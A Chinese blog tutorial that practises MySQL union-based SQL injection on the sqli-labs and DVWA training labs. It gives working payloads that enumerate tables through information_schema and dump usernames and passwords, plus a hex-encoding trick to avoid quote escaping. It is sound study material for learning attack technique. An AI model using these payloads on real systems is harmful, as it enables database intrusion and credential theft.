首页
所有分类
TAGS
文字工具 EMOJI BIBLE
数据库 MySQL

MySQL注入基础练习

Posted in MySQL onMay 30, 2021

以sqli-labs-master作为练习

初始:简单获取基础内容

第一步,使用拼接的方式决定注入类型

MySQL注入基础练习

第二部,使用order by确定有表单有几列值

order by根据指定的列对结果集进行排序

MySQL注入基础练习

第三步,使用union select 来找到内容,获取想要得到内容

union select :联合查询

MySQL注入基础练习

进阶,通过mysql注入获取表单内容,托库;

第一步:通过数据库语句进行搜索,首先确定数据库

MySQL注入基础练习

第二部:确定数据库后,爆出它的表;

MySQL注入基础练习

第三步:确定表以后,可根据实际需求爆表,这里以users举例,进行爆字段

MySQL注入基础练习

第四部:确定字段后,我们就可以拖库;

MySQL注入基础练习

DVWA训练基础 low级别

1.参照上文确定当前库

1' union select (select database()),2 -- -

MySQL注入基础练习

2.确定库后,爆表

1' union select (select group_concat(table_name) from information_schema.tables where table_schema = 'dvwa'),2 -- -

MySQL注入基础练习

3.确定表后,爆字段

1' union select (select group_concat(column_name) from information_schema.columns where table_schema = 'dvwa' and table_name='users'),2 -- -

MySQL注入基础练习

4.确定字段后,进行拖库

1' union select (select group_concat(concat_ws(0x7e,user,password))from users),2 -- -

MySQL注入基础练习

级别Medium

与low级别不同,没有输入框,只有选择项,所以需要借助bp工具

MySQL注入基础练习

1.打开代理使用bp进行抓包并发送到Repeater模块进行反复验证

MySQL注入基础练习

2.其余步骤参考上文:暴库

MySQL注入基础练习

爆表

ps:因为后台强制转译的问题,要注意避免单引号

MySQL注入基础练习

爆字段

同爆表,因为转译的问题,要注意避免引号,可使用编译规避;

1 union  select 1,(select group_concat(column_name) from information_schema.columns where table_schema = (select database()) and table_name=0x7573657273)

MySQL注入基础练习

拖库

MySQL注入基础练习

MySQL注入基础练习

- Author -

纪迁辰

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

MySQL 相关文章推荐
mysql 8.0.24 安装配置方法图文教程
May 12 MySQL
虚拟机linux端mysql数据库无法远程访问的解决办法
May 26 MySQL
MySQL CHAR和VARCHAR该如何选择
May 31 MySQL
低版本Druid连接池+MySQL驱动8.0导致线程阻塞、性能受限
Jul 01 MySQL
MySQL Shell import_table数据导入的实现
Aug 07 MySQL
MySQL常见优化方案汇总
Jan 18 MySQL
Mysql存储过程、触发器、事件调度器使用入门指南
Jan 22 MySQL
navicat 连接Ubuntu虚拟机的mysql的操作方法
Apr 02 MySQL
mysql使用instr达到in(字符串)的效果
Apr 03 MySQL
Mysql 8.x 创建用户以及授予权限的操作记录
Apr 18 MySQL
MySQL 执行数据库更新update操作的时候数据库卡死了
May 02 MySQL
MySQL远程无法连接的一些常见原因总结
Sep 23 MySQL
解决Navicat for MySQL 连接 MySQL 报2005错误的问题
MYSQL(电话号码,身份证)数据脱敏的实现
May 28 #MySQL
MySql开发之自动同步表结构
mysql升级到5.7时,wordpress导数据报错1067的问题
May 27 #MySQL
解决Navicat for Mysql连接报错1251的问题(连接失败)
Navicat for MySQL的使用教程详解
MySQL Router实现MySQL的读写分离的方法
Harman Kardon(1) 立体声(1) 调频(4) 中波(3) KDKA(1) 长波(3) 保养(1) 收音机(62) 电台频率(32) 短波(8)
You might like
PHP面向对象编程快速入门
2006/10/09 PHP
Discuz 模板语句分析及知识技巧
2009/08/21 PHP
PHP生成静态HTML文档实现代码
2016/06/23 PHP
解决extjs在firefox中关闭窗口再打开后iframe中js函数访问不到的问题
2008/11/06 Javascript
juqery 学习之三 选择器 简单 内容
2010/11/25 Javascript
JS继承 笔记
2011/07/13 Javascript
JS中window.open全屏命令解析及使用示例
2013/12/11 Javascript
如何正确使用javascript 来进行我们的程序开发
2014/06/23 Javascript
jQuery在ie6下无法设置select选中的解决方法详解
2016/09/20 Javascript
Bootstrapvalidator校验、校验清除重置的实现代码(推荐)
2016/09/28 Javascript
Javascript 函数的四种调用模式
2016/11/05 Javascript
JavaScript实现的可变动态数字键盘控件方式实例代码
2017/07/15 Javascript
随机生成10个不重复的0-100的数字(实例讲解)
2017/08/16 Javascript
关于react中组件通信的几种方式详解
2017/12/10 Javascript
vue项目中api接口管理总结
2018/04/20 Javascript
vue+vant实现商品列表批量倒计时功能
2020/01/13 Javascript
vue基于better-scroll实现左右联动滑动页面
2020/06/30 Javascript
JavaScript实现多球运动效果
2020/09/07 Javascript
[04:53]DOTA2英雄基础教程 祈求者
2014/01/03 DOTA
Python 字符串处理特殊空格\xc2\xa0\t\n Non-breaking space
2020/02/23 Python
简单了解如何封装自己的Python包
2020/07/08 Python
CSS3属性box-shadow使用详细教程
2012/01/21 HTML / CSS
Brother加拿大官网:打印机、贴标机、缝纫机
2019/10/09 全球购物
文秘专业应届生求职信范文
2013/11/14 职场文书
机电工程学生自荐信范文
2013/12/07 职场文书
运动会广播稿200米
2014/01/27 职场文书
计算机网络及管理学专业求职信
2014/06/05 职场文书
云南省召开党的群众路线教育实践活动总结会议新闻稿
2014/10/21 职场文书
经典爱情感言
2015/08/03 职场文书
2015年度工程师评职称工作总结
2015/10/14 职场文书
火锅店的开业营销方案范本!
2019/07/05 职场文书
合同范本之电脑出租
2019/08/13 职场文书
python爬取企查查企业信息之selenium自动模拟登录企查查
2021/04/08 Python
PyTorch的Debug指南
2021/05/07 Python
win11无法登录onedrive错误代码0x8004def7怎么办 ?
2022/04/05 数码科技
Redis高并发缓存架构性能优化
2022/05/15 Redis